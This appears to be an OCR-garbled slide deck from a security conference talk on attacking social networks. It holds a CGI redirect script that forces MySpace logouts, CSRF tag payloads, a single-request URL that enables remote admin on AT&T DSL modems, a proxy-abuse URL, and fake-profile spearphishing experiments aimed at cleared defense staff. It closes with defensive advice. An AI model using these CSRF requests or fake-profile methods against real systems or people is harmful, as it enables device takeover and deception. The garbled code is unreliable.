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Who are these idiots? 



^ Senior Consultant - Idea Information Security 

^ Associate Professor at UAT 

^ Founder / Hexagon Security 

^ Facebook, Linkedln, Twitter, MySpace 



^ Senior Consultant - FishNet Security 

^ Douchebag with Microphone 

t Sockpuppet herder and malcontent 



-acebook, Linkedln, Twitter, hates 
MySpace 
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nclude std disclaimer.h 



No animals, bloggers, journalists or camwhores were 
harmed during these demonstrations. While actual SocNet 
sites and users were involved, all payloads were benign and 
only resulted in wounded pride and possibly high blood 
pressure. 

We are not experts and should not be trusted in any way. 
Always ask your doctor before changing prescriptions or 
viewing LiveJournal session captures. 

No specific Social Network is intended as the sole object of 
ridicule, and the problems here are universal. 

There is much fail to be found, and much as of yet un found. 

For reals, yo. 
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WTF is this about? 



t Our obsession with SocNets, mostly. 

y Impromptu threat modeling over ${drinks}. 
^ Various (harmless) sorties on SocNet sites. 
^ SocEng experiments and silliness. 

^ Is / Was this Oday? 

^ No, at least we don't think so... 

^ "Featurebilities". Design flaws. Architecture FAIL. 

t They put it there... On purpose! Srsly! 
t Still, lots of soft, squishy attack surface 
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WTF is this about? 



t SocNets as attack platform 

illions of users A H A H A H A Htargets 



► 



► 




Business model: Ads, user-generated content 

Vuln Mashups 2.0 

Promiscuous and pervasive trust 
SocEng + vulns = attacker ROI 

App threats (OpenSocial, FB) 

Attacking clients with apps 
Attacking apps with apps 
SocNet as lightweight Botnet 
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Offsite Content = Fuxor 



^ Link to crap offsite = epic fail 

t> IMG tag CSRF 

^ CSS Jscript hijacking, click fraud, SocNet as botnet 

y Hello, SocNets. Plz fix. kthxbye. 

^ MySpace, Hi5, LiveJournal, many others. 

t Request Conversions (SSRF) 

t POST to GET 

^ Sometimes enforced / validated differently based on 
method 

We don't need XMLHTTP kung fu for GET-based 
CSRF 
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eet Alice, Bob, and Eva 
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inport cgi 



wmmtamtmm 



mmttiagmm&&£*&^^ 



def print_r«KrertCurl>; 

print 'Status; 3B7 TwjwnQry Redirect" 
print 'Location: " p url 
print 'Prague: w-cpche' 
print *Content-Type: text/html 1 

print ^IDOCTTPE HTU. PUBLIC "-//WC//0TD HTHL/ZW^ 

print *-dwDd>4Ktii http-«pjiv-" , nefr*&h F " contcnt-^fljurl-indcx.Miirrifcr^i 

print '<tttle>3«7 Twporory R#dlrecWtttU> 1 

print *<hl>367 T«^w™ry Redirect</hi>" 

print '^Redirected' 

f : print *« hnef"" l to l *>Jfa</»,* X (hurl p hurl) 



. PrtPi^ /x/\wsB/fa % 




vtcttvtte - *Mrtp://ii*s$^i^.iiysp0M.cwBe/tr*Je*.cf^^ \ 

&__E VEhnTWGET JL_E VEhrTARQUM£hrT^__VI£WSTATI ^HFHtPOHOL LTEwOTk4N j AZDTAPFgleHGFhZMftvZpU pZWS kc3s*f>»> \ 
uZH&xf)U3crW£ZXl*7AJN$IJk)ftQwhck^ \ 

UNBbVl EqN«UQXfBUJkymr9BeWl TWrRYMEVFqM9TcnFBZk5IUkllta£SYl tyaZttttil yQttFZ2Fq[IK5elKYTzE U*iZ3Lk!t9pVEF \ 
nJTJ idCllyZ jNSJT J nbz k&eGJ Pek F WMSl f*iYleEU5a3WTY3JlJeUQ3Y UHUttiGHZV3ZDF»4ndvWE9NSlQ3cHkzeE 53UZJ2VF J4S \ 
TF3c^l^lldteeDhzQitM$ttJ&zFPUHkUM S 

DZ3c4UCUy^nZWTJ ueWl rOUJwolQllfaJ FHlMbxUyYmVrUFpvWkrtWcNWhHtl kftpcDt3JT J iQVdpckWZ E ltd3l jdBZlHVR jY \ 
SUyY jlBSTJNJT>itFflJ rtZ^Ugl EEGRkFgICAQ?kF£lCAQ9k FgJ m02QffCg lCD*fllWh4tf/i*l irtU sZ^kZAlD0wBWC*aflZ2QW&iY \ 
PC2QKhHVM ? Z&rZXl IcAUZTGl taXKJbnBldCheoGliLCB j dG«w*F9 j cE lhcflBfTngeZVRvRnJ pZWS kX WpYXJ hYJRl c kNv(M50K \ 
TMBZ9uc£FzriG1JfQGlM£FzdGUodGtp^^ \ 

vT3V2BQ5$ZXlUdEJveCti^lzKK4&2KbtwyBQLC^^ \ 

XBfcc3RlBffikbUlZiif9yZV0hc3lUia^^ \ 

azviMWpZtt5io(Wkrf)UhY3RicicNvdft^ \ 

frri*9jCElh0l*5fT^ZVFN^pZll5kX6r^^ \ 

CAgCTFglftJnuWnfftZGQCBASPFglf^ ja*VfUZFZZUZlb \ 

GxOTnltfdjdGNf##3jcEihdnBfKi^ 

1 K3Hte EKhcJKOnnlJy l kAg YPZB YEAgE PZBYCAgE PZBYE AgEPFglf CMJDRXZtiZAICDxYQ*ttFA0V2 YHQCAitikFglCBQgPF gl f A \ 
NhkFgltAQSPFgleCE t tYWtfl VXJ seWlodHRwOl SvcZVj dXJ pdH kubU z cGF j Z S5 j bZflvYZ FndGHoY 59 j YXBOTZhhLiiFzcHgVZFU \ 
ZV j dXJpdM IJb2tl b jtyH]|l3MjYQRDdDKEYtt2z^^ kbDByjpilvP T F kZAIJ Drf9 k F 9 1 f QAVibGfl jTXR \ 

pto24u^lZiA9ICdQdHRHQi^i^lJvZml&ZSSteXIWYm \ 

mcrnxUmZydirVUZGl kPTH3ODg3N[>Y0Ni c?aiMdXJuIGZU)»tilOZQrAMie)(19Ob25«ai0sc 1J I cXVpaifVqb3N0QnF jo&tl eV9fF \ 
gE FJHWebDAwJ W*THF pbi RFZGlQRnVsbE ^MUkTZJ4RnVsllE5M)ilUFGZNeb[lAwJ ^mpbiRhZGK$C»Ufc*l#»alft3a'i8PZGZ \ 
kVW jdGwtCR jcElhx*4fcY2FKlGNayQ^^ tck+4wne*to4-type+ \ 

»*nt»to+ »nd44long+wi th+your+F rlendtftequest . &ctieQK24q*tai r«24F. di t Full MandE4tbxF 1 rsttkiM-Henryi V 
Ctiee9E24Cf«kllrac24EdltFul lN0n«gKZ4t«Ci(LOStt4anMlellon(ctieeK24cpH04 rl9K24btnA4dT0Fri«rid^Add+tOvFri«rids M 
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xternal Content = Fuxor 
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Innocuous Functions 



t Most s tes protect functions that appear 
valuab e 

^ Account changes, messaging, profile admin 
^ Computationally expensive overhead 
^ Token ized 

^ Things that don't appear valuable 

t> Logging out 

y Blocking communications 

^ Lots of other stuff 
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*i/vsr/b\n/env python 
liiffwrt cgi 

def p r i nt^redi pert Curl ) : 

print 'Status: 307 Tenjwary Redirect' 
print 'Location:', url 
print 'Prqspno: no-cache' 

-Type: text/htri 

print '<!00CTYPE HTML PUBLIC W -//*3C//DTD HTOL//ENV 

print '<headxmet<i http-equiv*" refresh" content» M 8;url-index.htm?refertai 

print '<tttle>307 Temporary RedirecWtttlo' 

print '^il>307 Terporary Redirect</hl>' 

print '<p>Redtrected l 

hurl - cgi. escape Curl, 1) 

print '<o href-"Xs">*s</c>.' * (hurl, hurl) 

i vi ctinsite - " http : //col lect - myspace . com/i ndex , cfin?fusea ct i on-si gnout " 
pri nt_redi rectCvictimsite) 



T htm™ /></head>' 
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mmmmmmmm vmm 



MySpace DoS 



mm m mmmmmmmmmtmmmmmmmmmmmm^^ 



4 hnp: /Yhome .nrys-pace .com .' id e*_cf rn^tfuLeactiona user 



t h> £3 'Google 
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PrvEk:y|Hi^|^7<M 
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No JavaScript No Prob 

There may be other ways ;) 

y <img src=" http://domain.com/redirected_imaae > 

^ <meta http-equiv=" refresh" content="0;url=httm// 
domain .com/whatever "> 

^ <iframe src=" http://domain.com/whatever "></iframe> 
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Local Net Ownage 



^ AT&T's DSL Modems (Motorola / Netopia) 

y One request and you are remote admin :) 

t Home LAN pwnage from visiting a MySpace Page 

y http://www.neohaxor.Org/2008/1 2/01/csrf-vulns-on- 
local-network-devices/ 

t http://192.168.1.254:80/Forms/remoteRES 1? 

NSSJRemotePassword=blehblah&NSS EnableWAN 
AdminAccessRES=on&timeoutDisable=D&Enable=E 
nable 



G) !^#j _hllp:/Jl«. 168 1254/ 





mm&mmmmmmmmmmmmmimmmmm*^^ 






L ji ^t iOTirtr^itf ^iii iiiiOiMii/i^Ltfiirjtfi i>>^»iWjWiiaiir3i^ir uitiii ra iWiH< >tf ^u^»ii¥ . 
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gic Attacks on SocNets 



t Attacks don't always have to be so 
straight forward 

^ Extremely difficult to identify through 
automated testing. 

^ AdultFriendFinder privilege escalation 

t> It's a SocNet, right? We think so! 

y Allows for the viewing of paid for content 
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lite AFF pwnage. Ph33r. 
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Luumng for Hot playmates!! 1 
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Add to Favorite Photos I See Larger Photo 
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year old Couple {man and woman) if 
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Cross-Dresssng, Disc r eet Relat cns n ip. Erotic Chalof Email, 
Exhibition is nWoyeurism. Group sex (3 or rrcre!], M sc. Fetishes, Other 
"Alternative" Activities o r Sacisn & Maseeh sir 
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mmmmmmmmmm 
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e did you a favor. Srsly. 
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SocNet SocEng 



j ► SocEng = low line noise, high hit rate 

y Great ROI for a targeted attack. 

y Diamond-tipped spearphishing. =) 

y Build a plausible profile 

y Public sources, company data 

y Get "respectable" # of connections 

y And then what, pray tell? 

y We just built friends / connections 

y Real attack: mail / msg custom payload 
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The Marcus Experiment 




Marcus was concerned about 
SocNets. He agreed to help us out. 
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The Marcus Experiment 



The end result 

^ 50+ connections in less than 24 hours 

t> CSOs, bigwigs, CISSPs, feds, ISSAppI, 
and my personal favorite... 



WttMIP^WMPillOT^^^ 
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Say Hello to Amber. 






Linke-dFri: Amber Morion - Moi ill J F ire-lax 
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Seeking Penetration? 



mmmmsmmmmmm % 
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Group? 



My Groups | Groups Directory | Create a Group | FAQ 
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Security Clearance Jobs 
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Updates Members Settings 



Discussion: 



Group Profile 



Go back to a* Discussions > | < Previous | Next » 




Amber Norton m) 

SeniorTechnicai Recruiter. 

Federal Practice 

Se-e all Arrber's discussions *■ 



t 




Seeking IT Security and Penetration 

I'm currently trying to fill a number of contract positions for a Federal client looking 
for "penetration experts" or "ethical hackers'", with a strong preference for 
candidates .'.- : : .--sntly hold an active TS/SCI. The positions are "virual" and can 
be anywhere in the US, (expect arourd 25% travel), and pay ranges seem to be in 
line with what my research shows is fair, a litiEe over 100K USD with benefits, 
higher as an hourly rate on 1099 or corp-to-corp if you can obtain your own benefits 
These contract positions can be 1099, W-2 corp-to-corp, I can do whate^i woil.s 
for you. This is supporting a two year contract, and I'd like to see contract terms 
from candidates of anywhere from 6 months to a year. Some skillset keywords lYn 
look ng for in candidate resumes: Nessus. Nmap, Firewalk. Snort. CEH. CANVAS. 
Core Impact. Metasploit, AppSean, Weblnspect I'm also looking for other general 
security practitioners who current hold a TS/SCI. Contact me for details! 
You have 14 minutes to make changes Edit Discussion I Delete discussion 
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Amber Wins. 



^ The end result: 

^ 50+ cleared / defense connections 

> CISO of $TLA (Ssssshhh...) 

^ Wow, lots of BAH people. 

y My favorite: 



\ 






i 



Hi 




From: Bob Krangle 
Date: February 5, 2009 
Tot: Amber Noi-ton 
Status? Pending 



You and Bob Krangle share a nettteil- or group 



\ I haue an interim C6 clearance - is that good? 

Bob Krangle 
972-4S9-35C8 

i 



flN*fe*jMapjS*»6^^ 
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DM fail 



/ ^ Alex leaves lenscap on 



^ alexsotirov : ..the situation. It's quite complicated. I'm about to fly to SFO, landing at 
\ It 9pm You can reach ne * ** ■■-- -^ after :h at 

'* about 2 hours ago ■ Re^ ■ View Tweet 




Tj 



alexsotirov : Everybody who saw the tweet with my phone number before I deleted it, 
call me if you're bored :-) It was supposed to be a direct message. 

about 2 hours ago ■ Reply ■ View Tweet 
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sh Fail from Green Zone 



Just landed in Baghdad. I believe it may 
i be first time I've had bb service in Iraq. 11 
I th trip here. 

about 24 hours ago from TwitterBerry 

Wi^ petehoekstra 

Pete Hoekstra 





/hmer^con 



/^•^ 



Monday, February 9, 2009 




OpenSocial Apps 




Your bling just bit you in the ass, douchebag. 
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ser Installed Nunchaku 



^ Who needs vulns? 

^ Convenient APIs, 100% arbitrary code 

y OpenSocial: "Write once, Own anywhere. "(tm) 

y Pick a meme, get installs... Then "go rogue". 

y Your own personal botnet, for a few lines of PHP. 

t SocNet sites DON'T CARE. Period. 

y EULA and separate domain = zero responsibility 

^ Arbitrary execution on most sites 

^ Little to no validation (vetting process, # friends) 

"n ► Any app can attack another app (same domain) 




Let's Fighting Love 
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Origin Shmorigin 



^ What about same origin? 

^ What are you attacking? Site, or user? 
^ API functions allow you to proxy requests 

^ Comes from server, not client though ;) 

t GETs 

t POSTs 

^ Depends on the attacker and goal. 

^ Are you targetting the site itself? 

^ Can still hit many clients via apps 

► We can also CSRF via simple GETs w/o XSS 

J 
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Proof and Pudding 



DCS) CU > np:/; preface 



fltmyspacecom 



HDfTM Hail f Profile 



Naihifl - 31 - Mile -JACKSONVILLE, Florid - wAw,mv«HiM.«rt*/37}73*80J 
The page at hcip:/ /api.msappspatexom says: 
nam e» Pants^5ecnet_Cocjkie 
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Nathan is in on your network. 
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Nathan's Blurbs 

Abnut mr:: 

1 am Nathan, r im a WOJrlty proie-MJOfial an-d a pnjtre&pr £t fl l/m^nuty. [ 

*pcfl£j mgft of rny time pondering prD&flern* pf the world flnfl trying to: wo** 

WlUtJQti? fgr them. | have been Involve*! wrtli art flnfl munc mgrt o* my life : 

well. 

Who Id like to meet: 

All Of the nHnVtehl of Hie A-Te*ffl. 

Are v&u down with the Hea? 
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More relay.proxy :) 




t Used to access cross-domain content 

p Anonymous calls can be made to it 

p Appears to be doing content filtering now 

p Linkedln does it too! Part of the OpenSocial API 

^ They changed the opensocial_token from 
our example at Black Hat 

p All apps have an opensocial_token, just use one of 
those 

http://api.msappspace.com/proxy/relay.proxy? 

opensocial token=sMAPei02 1 9jvS7VQaBVWaKTs 1 6cFED5lwyeMNN 

FEIzQgqBRjBhXM8EugjDvqPIFS8uDoTjHfGEYGe74uvFMCQ/ 

Uu2mTyxAQa I LH3w55n3u8=&opensocial_url=http%3 A// 

www.hexsec.com 
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WhatIsMyIP.com 



The fastest and easiest way to determine your IP address. 



- IF Address 

* IF Command Lines 

* IP Addresses IfxpLaincd 

* Speed Test 

* Automauon 

- WhafsNew 



Your IP Address Is 204.16 33.73 




Relay.Proxy fail. 
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Dev Apps Enum 
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Cajoley Caja, Batman! 



t Caja is meant to create "safe" JavaScript in 
OpenSocial 

^ Tries to un-suckify .js, removing: 

^ eval() 

y top. location 

^ And many others... 

^ Demonstrates the way this problem is typically 
approached anyway. 

^ Seems irrelevant if it's implemented opt-in. 
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resh fail since Black Hat 



Facebot 

Linkedln Malware FUD 

CSRF in OAuth 

Facebook 419 Scams 

Facebook XSS 

Twitter admin int / celeb phishing 
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Banner Attacks 
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Protection From Apps 



t Identify app content 

y Blocking iframes 

t Click fraud 

t CSRF 

^ Malicious scripts 

^ Blocking <div> content 

^ More of an impact on social experience 
^ Protects from the same as above 
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^ Firefox Extension 
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CSRFblocker 
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CSRFblocker Pr&fc 



CSRFblocker Functions 

glfjiibkCSRFblotker 

M Enable Warnings 

Mw«k All Private Wt\ ltLXJU.K. L72.16.M.N. IH.IM.K.K 

^ Clock Localhost 127.x.x.x 

Tag Handling Functions 



f5f tnabk Link Removal 

£! Block LMG tags below height p* — width px y 

M Block iriUMtngs below heighipx ~ width p* y 



URL List 
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CSRFblocker Info 



^ http://www.hexsec.com/labs.html 
t Not just for CSRF 

^ Block Sites 

^ IMG tags and IFRAMEs Oh My! 

^ Page and Cookie Isolation 

^ Future features and brainstorming 
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But what to do? 



Kill external content 

Drastically reduce API functionality 

Threat model your stuff, people 

Props to late adopters. =) 

No opt in security models 

Developers, Developers, Developers 

Profile lifetime bit (member since / training 
wheels) 

^ Email verification for corporate socnets 
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Any Questions? 





We think you are awesome for 

sitting in this room and not 
throwing too much crap at us. 
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